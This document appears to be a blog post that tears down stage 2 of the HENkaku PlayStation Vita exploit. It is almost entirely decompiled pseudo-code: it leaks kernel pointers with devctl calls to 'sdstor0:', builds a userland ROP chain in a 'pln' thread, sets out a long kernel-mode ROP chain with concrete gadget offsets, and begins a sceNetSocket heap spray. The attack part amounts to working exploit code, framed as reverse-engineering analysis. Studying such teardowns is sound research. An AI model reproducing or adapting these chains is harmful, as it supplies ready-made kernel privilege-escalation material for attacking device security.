Hacking the planet...: HENkaku - Exploit teardown

HENkaku - Stage 2

Stage 2's payload is composed by another ROP chain and data.

It creates two userland threads (each one with it's own ROP chain), that take care of leaking kernel pointers (by issuing devctl commands to "sdstor0:") and breaking the userland sandbox (by exploiting sceNet functions).

	// Copy SD card device path and param
	strcpy(x_stack + 0x000086B4, "sdstor0:");
	strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");

	// Clear devctl 0x05 outbuf
	// From x_stack + 0x00006F34 to x_stack + 0x00007334
	memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);

	// Copy dummy device path
	strcpy(x_stack + 0x000086E4, "molecule0:");

	// Mount path?
	sceLibKernel_A4AD("molecule0:");

	// Send command 0x05 to "sdstor0:"
	sceIoDevctl("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);

	// Store leaked kernel pointer 1
	// Comes from devctl_outbuf + 0x3D4
	0x00(x_stack + 0x00008464) = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9

	// Create "pln" thread
	// "pln" == "pointer leak n"?
	// Entry (0x000054C8): LDMIA R1,{R1,R2,R4,R8,R11,SP,PC}
	int thread_id = sceKernelCreateThread("pln", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

	// Store "pln" thread's ID
	0x00(x_stack + 0x00008E94) = thread_id

	// Store SceKernelThreadInfo size
	0x00(x_stack + 0x0000862C) = 0x7C

	// Get thread info structure
	sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);

	// Save pln_threadinfo.stack + 0x00001000
	0x00(x_stack + 0x00008EA0) = 0x00(x_stack + 0x00008660) + 0x00001000

	// Stack parameters for "pln" ROP chain
	0x00(x_stack + 0x00008954) = 0x00000014
	0x00(x_stack + 0x00008958) = x_stack + 0x00006F34
	0x00(x_stack + 0x0000895C) = 0x000003FF

	// Stack parameters for "pln" ROP chain
	0x00(x_stack + 0x0000896C) = 0x00000400
	0x00(x_stack + 0x00008970) = 0x00000000
	0x00(x_stack + 0x00008974) = 0x00000000

	// Setup "pln" ROP chain
	0x00(x_stack + 0x00008708) = 0x008DD9B5
	0x00(x_stack + 0x0000870C) = 0x000086E4
	0x00(x_stack + 0x00008710) = 0x00000000
	0x00(x_stack + 0x00008714) = 0x00000000
	0x00(x_stack + 0x00008718) = 0x00000000
	0x00(x_stack + 0x0000871C) = 0x0000A4AD
	0x00(x_stack + 0x00008720) = 0x00000000
	0x00(x_stack + 0x00008724) = 0x000FCDBB
	0x00(x_stack + 0x00008728) = 0x00000000
	0x00(x_stack + 0x0000872C) = 0x008DD9B5
	0x00(x_stack + 0x00008730) = 0x000086B4
	0x00(x_stack + 0x00008734) = 0x00000005
	0x00(x_stack + 0x00008738) = 0x000086CC
	0x00(x_stack + 0x0000873C) = 0x00008954
	0x00(x_stack + 0x00008740) = 0x0000690C
	0x00(x_stack + 0x00008744) = 0x00000000
	0x00(x_stack + 0x00008748) = 0x000FCDBB
	0x00(x_stack + 0x0000874C) = 0x00000000
	0x00(x_stack + 0x00008750) = 0x008DD9B5
	0x00(x_stack + 0x00008754) = 0x000F4240
	0x00(x_stack + 0x00008758) = 0x00000000
	0x00(x_stack + 0x0000875C) = 0x00000000
	0x00(x_stack + 0x00008760) = 0x00000000
	0x00(x_stack + 0x00008764) = 0x00018544
	0x00(x_stack + 0x00008768) = 0x00000000
	0x00(x_stack + 0x0000876C) = 0x000FCDBB
	0x00(x_stack + 0x00008770) = 0x00000000
	0x00(x_stack + 0x00008774) = 0x008DD9B5
	0x00(x_stack + 0x00008778) = 0x000086B4
	0x00(x_stack + 0x0000877C) = 0x00000005
	0x00(x_stack + 0x00008780) = 0x00007444
	0x00(x_stack + 0x00008784) = 0x0000896C
	0x00(x_stack + 0x00008788) = 0x0000690C
	0x00(x_stack + 0x0000878C) = 0x00000000
	0x00(x_stack + 0x00008790) = 0x000FCDBB
	0x00(x_stack + 0x00008794) = 0x00000000
	0x00(x_stack + 0x00008798) = 0x00000519

	/*
	"pln" ROP

	// Mount path?
	sceLibKernel_A4AD("molecule0:");

	// Send devctl 0x05
	sceIoDevctl_syscall("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);

	// Delay for a while
	sceKernelDelayThread(1000000);

	// Send devctl 0x05 again using
	// input buffer from x_stack + 0x00007444 to x_stack + 0x00007844
	sceIoDevctl_syscall("sdstor0:", 0x00000005, x_stack + 0x00007444, 0x00000400, 0x00000000, 0x00000000);

	// Deadlock
	sceWebkit_519();
	*/

	// Copy "pln" ROP chain into "pln" thread's stack
	memcpy(0x00(x_stack + 0x00008EA0), x_stack + 0x00008708, 0x00000100);

	// Set stack pointer
	0x00(x_stack + 0x00008830) = x_stack + 0x00008EA0

	// Set PC
	0x00(x_stack + 0x00008834) = 0x000C048B // POP {PC}

	// Start "pln" thread
	// Thread arguments are loaded into R1 and the gadget
	// at the thread's entrypoint then loads register values
	// from it, overwritting SP and PC and triggering the
	// ROP chain
	sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);

	// Delay for a while
	sceKernelDelayThread(100000);

	// Store leaked kernel pointer 2
	// Comes from devctl_outbuf + 0x3C4
	0x00(x_stack + 0x00008458) = 0x00(x_stack + 0x000072F8) + 0xFFFFF544

	// Setup pointer to leaked address in kernel module 1
	0x00(x_stack + 0x00007444) = 0x00(x_stack + 0x00008464) + 0x0001E460

	// Setup pointer to leaked address in kernel module 2
	0x00(x_stack + 0x00008EAC) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000300

	// Setup kernel mode ROP chain
	0x00(x_stack + 0x00008A8C) = 0x00(x_stack + 0x00008464) + 0x00000031
	0x00(x_stack + 0x00008A90) = 0x08106803
	0x00(x_stack + 0x00008A94) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
	0x00(x_stack + 0x00008A98) = 0x00000038
	0x00(x_stack + 0x00008A9C) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
	0x00(x_stack + 0x00008AA0) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008AA4) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008AA8) = 0x00(x_stack + 0x00008464) + 0x0001B571
	0x00(x_stack + 0x00008AAC) = 0x00000000
	0x00(x_stack + 0x00008AB0) = 0x00(x_stack + 0x00008464) + 0x00001E43
	0x00(x_stack + 0x00008AB4) = 0x00000000
	0x00(x_stack + 0x00008AB8) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
	0x00(x_stack + 0x00008ABC) = 0x00(x_stack + 0x00008464) + 0x0000EA73
	0x00(x_stack + 0x00008AC0) = 0x00(x_stack + 0x00008464) + 0x00000031
	0x00(x_stack + 0x00008AC4) = 0x00(x_stack + 0x00008464) + 0x00027913
	0x00(x_stack + 0x00008AC8) = 0x00(x_stack + 0x00008464) + 0x0000A523
	0x00(x_stack + 0x00008ACC) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008AD0) = 0x00(x_stack + 0x00008464) + 0x00000CE3
	0x00(x_stack + 0x00008AD4) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008AD8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
	0x00(x_stack + 0x00008ADC) = 0x00(x_stack + 0x00008464) + 0x00000067
	0x00(x_stack + 0x00008AE0) = 0x00(x_stack + 0x00008464) + 0x0000587F
	0x00(x_stack + 0x00008AE4) = 0x00(x_stack + 0x00008464) + 0x00019713
	0x00(x_stack + 0x00008AE8) = 0x00(x_stack + 0x00008464) + 0x00001605
	0x00(x_stack + 0x00008AEC) = 0x00(x_stack + 0x00008464) + 0x00001E1D
	0x00(x_stack + 0x00008AF0) = 0x00000000
	0x00(x_stack + 0x00008AF4) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
	0x00(x_stack + 0x00008AF8) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008AFC) = 0x00(x_stack + 0x00008464) + 0x00001603
	0x00(x_stack + 0x00008B00) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
	0x00(x_stack + 0x00008B04) = 0x00(x_stack + 0x00008464) + 0x00001F17
	0x00(x_stack + 0x00008B08) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008B0C) = 0x00(x_stack + 0x00008464) + 0x00000031
	0x00(x_stack + 0x00008B10) = 0x00(x_stack + 0x00008464) + 0x0000B913
	0x00(x_stack + 0x00008B14) = 0x00(x_stack + 0x00008464) + 0x00023B61
	0x00(x_stack + 0x00008B18) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008B1C) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008B20) = 0x00(x_stack + 0x00008464) + 0x000232EB
	0x00(x_stack + 0x00008B24) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008B28) = 0x00(x_stack + 0x00008464) + 0x0001B571
	0x00(x_stack + 0x00008B2C) = 0x00(x_stack + 0x00008464) + 0x00023B61
	0x00(x_stack + 0x00008B30) = 0x00(x_stack + 0x00008464) + 0x000232F1
	0x00(x_stack + 0x00008B34) = 0x00(x_stack + 0x00008464) + 0x00001411
	0x00(x_stack + 0x00008B38) = 0x00(x_stack + 0x00008464) + 0x00000AE1
	0x00(x_stack + 0x00008B3C) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008B40) = 0x00(x_stack + 0x00008464) + 0x000050E9
	0x00(x_stack + 0x00008B44) = 0x00(x_stack + 0x00008464) + 0x00001411
	0x00(x_stack + 0x00008B48) = 0x00000010
	0x00(x_stack + 0x00008B4C) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
	0x00(x_stack + 0x00008B50) = 0x00(x_stack + 0x00008464) + 0x00012B11
	0x00(x_stack + 0x00008B54) = 0x00(x_stack + 0x00008464) + 0x00000CE3
	0x00(x_stack + 0x00008B58) = 0x00(x_stack + 0x00008464) + 0x000000D1
	0x00(x_stack + 0x00008B5C) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008B60) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
	0x00(x_stack + 0x00008B64) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008B68) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008B6C) = 0x00(x_stack + 0x00008464) + 0x0001FDC5
	0x00(x_stack + 0x00008B70) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
	0x00(x_stack + 0x00008B74) = 0x00(x_stack + 0x00008464) + 0x00019399
	0x00(x_stack + 0x00008B78) = 0x00(x_stack + 0x00008464) + 0x00019399
	0x00(x_stack + 0x00008B7C) = 0x00(x_stack + 0x00008464) + 0x00011C5F
	0x00(x_stack + 0x00008B80) = 0x00(x_stack + 0x00008464) + 0x00019399
	0x00(x_stack + 0x00008B84) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008B88) = 0x00(x_stack + 0x00008464) + 0x0000B913
	0x00(x_stack + 0x00008B8C) = 0x00000000
	0x00(x_stack + 0x00008B90) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
	0x00(x_stack + 0x00008B94) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008B98) = 0x00(x_stack + 0x00008464) + 0x00001861
	0x00(x_stack + 0x00008B9C) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
	0x00(x_stack + 0x00008BA0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
	0x00(x_stack + 0x00008BA4) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008BA8) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008BAC) = 0x00(x_stack + 0x00008464) + 0x00019399
	0x00(x_stack + 0x00008BB0) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008BB4) = 0x00(x_stack + 0x00008464) + 0x00019399
	0x00(x_stack + 0x00008BB8) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008BBC) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008BC0) = 0x00(x_stack + 0x00008464) + 0x0001614D
	0x00(x_stack + 0x00008BC4) = 0x00(x_stack + 0x00008464) + 0x000233D3
	0x00(x_stack + 0x00008BC8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
	0x00(x_stack + 0x00008BCC) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008BD0) = 0x00(x_stack + 0x00008464) + 0x000000AF
	0x00(x_stack + 0x00008BD4) = 0x00(x_stack + 0x00008464) + 0x00001605
	0x00(x_stack + 0x00008BD8) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
	0x00(x_stack + 0x00008BDC) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008BE0) = 0x00(x_stack + 0x00008464) + 0x000050E9
	0x00(x_stack + 0x00008BE4) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008BE8) = 0x00(x_stack + 0x00008464) + 0x00001347
	0x00(x_stack + 0x00008BEC) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008BF0) = 0x00(x_stack + 0x00008464) + 0x000000B9
	0x00(x_stack + 0x00008BF4) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
	0x00(x_stack + 0x00008BF8) = 0x00(x_stack + 0x00008464) + 0x00001347
	0x00(x_stack + 0x00008BFC) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008C00) = 0x00(x_stack + 0x00008464) + 0x0000039B
	0x00(x_stack + 0x00008C04) = 0x00000000
	0x00(x_stack + 0x00008C08) = 0x00(x_stack + 0x00008464) + 0x0001CB95
	0x00(x_stack + 0x00008C0C) = 0x00(x_stack + 0x00008464) + 0x0001EA93
	0x00(x_stack + 0x00008C10) = 0x00(x_stack + 0x00008464) + 0x00001411
	0x00(x_stack + 0x00008C14) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008C18) = 0x00(x_stack + 0x00008464) + 0x000209D7
	0x00(x_stack + 0x00008C1C) = 0x00(x_stack + 0x00008464) + 0x000209D3
	0x00(x_stack + 0x00008C20) = 0x00(x_stack + 0x00008464) + 0x00001411
	0x00(x_stack + 0x00008C24) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008C28) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
	0x00(x_stack + 0x00008C2C) = 0x00(x_stack + 0x00008464) + 0x00001605
	0x00(x_stack + 0x00008C30) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008C34) = 0x00(x_stack + 0x00008464) + 0x0000652B
	0x00(x_stack + 0x00008C38) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008C3C) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
	0x00(x_stack + 0x00008C40) = 0x00(x_stack + 0x00008464) + 0x00022A49
	0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
	0x00(x_stack + 0x00008C48) = 0x00(x_stack + 0x00008464) + 0x0000039B
	0x00(x_stack + 0x00008C5C) = 0x00000040
	0x00(x_stack + 0x00008C50) = 0x00(x_stack + 0x00008464) + 0x00022A49
	0x00(x_stack + 0x00008C54) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008C58) = 0x00(x_stack + 0x00008464) + 0x0000652B
	0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008C60) = 0x00(x_stack + 0x00008464) + 0x0000039B
	0x00(x_stack + 0x00008C64) = 0x00000040
	0x00(x_stack + 0x00008C68) = 0x00(x_stack + 0x00008464) + 0x00001605
	0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008C70) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
	0x00(x_stack + 0x00008C74) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008C78) = 0x00(x_stack + 0x00008464) + 0x00000853
	0x00(x_stack + 0x00008C7C) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
	0x00(x_stack + 0x00008C80) = 0x00000038
	0x00(x_stack + 0x00008C84) = 0x00(x_stack + 0x00008464) + 0x000000AB
	0x00(x_stack + 0x00008C88) = 0x00(x_stack + 0x00008464) + 0x000000D1
	0x00(x_stack + 0x00008C8C) = 0x00(x_stack + 0x00008464) + 0x0002328B
	0x00(x_stack + 0x00008C90) = 0x00(x_stack + 0x00008464) + 0x00022FCD
	0x00(x_stack + 0x00008C94) = 0x00(x_stack + 0x00008464) + 0x000000D1
	0x00(x_stack + 0x00008C98) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
	0x00(x_stack + 0x00008C9C) = 0x00(x_stack + 0x00008464) + 0x0002A117
	0x00(x_stack + 0x00008CA0) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008CA4) = 0x00(x_stack + 0x00008464) + 0x00001605
	0x00(x_stack + 0x00008CA8) = 0x00(x_stack + 0x00008464) + 0x00019399
	0x00(x_stack + 0x00008CAC) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008CB0) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008CB4) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
	0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
	0x00(x_stack + 0x00008CBC) = 0x00(x_stack + 0x00008464) + 0x0000039B
	0x00(x_stack + 0x00008CC0) = 0x00000040
	0x00(x_stack + 0x00008CC4) = 0x00(x_stack + 0x00008464) + 0x00022A49
	0x00(x_stack + 0x00008CC8) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008CCC) = 0x00(x_stack + 0x00008464) + 0x00003D73
	0x00(x_stack + 0x00008CD0) = 0x00000000
	0x00(x_stack + 0x00008CD4) = 0x00(x_stack + 0x00008464) + 0x000021FD
	0x00(x_stack + 0x00008CD8) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008CDC) = 0x00(x_stack + 0x00008464) + 0x000050E9
	0x00(x_stack + 0x00008CE0) = 0x00(x_stack + 0x00008464) + 0x00000AE1
	0x00(x_stack + 0x00008CE4) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008CE8) = 0x00(x_stack + 0x00008464) + 0x0002A117
	0x00(x_stack + 0x00008CEC) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008CF0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
	0x00(x_stack + 0x00008CF4) = 0x00(x_stack + 0x00008464) + 0x00000067
	0x00(x_stack + 0x00008CF8) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008CFC) = 0x00(x_stack + 0x00008464) + 0x0001BF47
	0x00(x_stack + 0x00008D00) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008D04) = 0x00(x_stack + 0x00008464) + 0x000050E9
	0x00(x_stack + 0x00008D08) = 0x00(x_stack + 0x00008464) + 0x0000AF33
	0x00(x_stack + 0x00008D0C) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008D10) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
	0x00(x_stack + 0x00008D14) = 0x00000000
	0x00(x_stack + 0x00008D18) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
	0x00(x_stack + 0x00008D1C) = 0x00(x_stack + 0x00008464) + 0x0000EA73
	0x00(x_stack + 0x00008D20) = 0x00(x_stack + 0x00008464) + 0x0000039B
	0x00(x_stack + 0x00008D24) = 0x00(x_stack + 0x00008464) + 0x00000853
	0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
	0x00(x_stack + 0x00008D2C) = 0x08106803
	0x00(x_stack + 0x00008D30) = 0x00(x_stack + 0x00008464) + 0x000233D3
	0x00(x_stack + 0x00008D34) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008D38) = 0x00(x_stack + 0x00008464) + 0x00000433
	0x00(x_stack + 0x00008D3C) = 0x00(x_stack + 0x00008464) + 0x000233D3
	0x00(x_stack + 0x00008D40) = 0x00(x_stack + 0x00008464) + 0x000150A3
	0x00(x_stack + 0x00008D44) = 0x00000000
	0x00(x_stack + 0x00008D48) = 0x00(x_stack + 0x00008464) + 0x0000A74D
	0x00(x_stack + 0x00008D4C) = 0x00(x_stack + 0x00008464) + 0x00000000
	0x00(x_stack + 0x00008D50) = 0x00(x_stack + 0x00008464) + 0x00000853
	0x00(x_stack + 0x00008D54) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
	0x00(x_stack + 0x00008D58) = 0x00000000
	0x00(x_stack + 0x00008D5C) = 0x00(x_stack + 0x00008464) + 0x00001605
	0x00(x_stack + 0x00008D60) = 0x00(x_stack + 0x00008464) + 0x00000347
	0x00(x_stack + 0x00008D64) = 0x00(x_stack + 0x00008464) + 0x000050E9
	0x00(x_stack + 0x00008D68) = 0x00(x_stack + 0x00008464) + 0x00001605
	0x00(x_stack + 0x00008D6C) = 0x00(x_stack + 0x00008464) + 0x00022FCD
	0x00(x_stack + 0x00008D70) = 0x00(x_stack + 0x00008464) + 0x000039EB
	0x00(x_stack + 0x00008D74) = 0x00(x_stack + 0x00008464) + 0x00000853
	0x00(x_stack + 0x00008D78) = 0x00(x_stack + 0x00008464) + 0x00011C5F

	// Overwrite specific NULLs in the ROP chain
	0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC)
	0x00(x_stack + 0x00008B48) = 0x00000090
	0x00(x_stack + 0x00008CC0) = 0x00000240
	0x00(x_stack + 0x00008D58) = 0x00000200
	0x00(x_stack + 0x00008D14) = 0x00008FC0

	// Copy kernel ROP chain
	memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);

	// Copy the first 0x400 bytes of "obfuscated" data
	// and append them at the bottom of the ROP chain
	memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);

	// Set kernel thread SP, PC, UNK
	0x00(x_stack + 0x00008858) = 0x00(x_stack + 0x00008458) + 0x000006DC
	0x00(x_stack + 0x0000884C) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000004
	0x00(x_stack + 0x00008850) = 0x00(x_stack + 0x00008464) + 0x00000347

	// Create "mhm" thread
	// "mhm" == "move heap memory"?
	// Entry (0x000054C8): LDMIA R1, {R1,R2,R4,R8,R11,SP,PC}
	int thread_id = sceKernelCreateThread("mhm", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

	// Store "mhm" thread's ID
	0x00(x_stack + 0x00008620) = thread_id

	// Store SceKernelThreadInfo size
	0x00(x_stack + 0x0000862C) = 0x0000007C

	// Get "mhm" thread's info structure
	sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);

	// Store mhm_threadinfo.stack + 0x00001000
	0x00(x_stack + 0x000086FC) = 0x00(x_stack + 0x00008660) + 0x00001000

	// Spam sceNetSocket requests
	// sceNetSocket("x", AF_INET, SOCK_STREAM, 0);
	0x00(x_stack + 0x00008470) = sceNetSocket(x_stack + 0x00010388, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008474) = sceNetSocket(x_stack + 0x00010390, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008478) = sceNetSocket(x_stack + 0x00010398, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000847C) = sceNetSocket(x_stack + 0x000103A0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008480) = sceNetSocket(x_stack + 0x000103A8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008484) = sceNetSocket(x_stack + 0x000103B0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008488) = sceNetSocket(x_stack + 0x000103B8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000848C) = sceNetSocket(x_stack + 0x000103C0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008490) = sceNetSocket(x_stack + 0x000103C8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008494) = sceNetSocket(x_stack + 0x000103D0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008498) = sceNetSocket(x_stack + 0x000103D8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000849C) = sceNetSocket(x_stack + 0x000103E0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084A0) = sceNetSocket(x_stack + 0x000103E8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084A4) = sceNetSocket(x_stack + 0x000103F0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084A8) = sceNetSocket(x_stack + 0x000103F8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084AC) = sceNetSocket(x_stack + 0x00010400, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084B0) = sceNetSocket(x_stack + 0x00010408, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084B4) = sceNetSocket(x_stack + 0x00010410, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084B8) = sceNetSocket(x_stack + 0x00010418, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084BC) = sceNetSocket(x_stack + 0x00010420, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084C0) = sceNetSocket(x_stack + 0x00010428, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084C4) = sceNetSocket(x_stack + 0x00010430, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084C8) = sceNetSocket(x_stack + 0x00010438, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084CC) = sceNetSocket(x_stack + 0x00010440, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084D0) = sceNetSocket(x_stack + 0x00010448, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084D4) = sceNetSocket(x_stack + 0x00010450, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084D8) = sceNetSocket(x_stack + 0x00010458, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084DC) = sceNetSocket(x_stack + 0x00010460, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084E0) = sceNetSocket(x_stack + 0x00010468, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084E4) = sceNetSocket(x_stack + 0x00010470, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084E8) = sceNetSocket(x_stack + 0x00010478, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084EC) = sceNetSocket(x_stack + 0x00010480, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084F0) = sceNetSocket(x_stack + 0x00010488, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084F4) = sceNetSocket(x_stack + 0x00010490, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084F8) = sceNetSocket(x_stack + 0x00010498, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x000084FC) = sceNetSocket(x_stack + 0x000104A0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008500) = sceNetSocket(x_stack + 0x000104A8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008504) = sceNetSocket(x_stack + 0x000104B0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008508) = sceNetSocket(x_stack + 0x000104B8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000850C) = sceNetSocket(x_stack + 0x000104C0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008510) = sceNetSocket(x_stack + 0x000104C8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008514) = sceNetSocket(x_stack + 0x000104D0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008518) = sceNetSocket(x_stack + 0x000104D8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000851C) = sceNetSocket(x_stack + 0x000104E0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008520) = sceNetSocket(x_stack + 0x000104E8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008524) = sceNetSocket(x_stack + 0x000104F0, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008528) = sceNetSocket(x_stack + 0x000104F8, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x0000852C) = sceNetSocket(x_stack + 0x00010500, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008530) = sceNetSocket(x_stack + 0x00010508, 0x00000002, 0x00000001, 0x00000000);
	0x00(x_stack + 0x00008534) = sceNetSocket(x_stack + 0x00010510, 0x00000002, 0x00000001, 0x00000000);
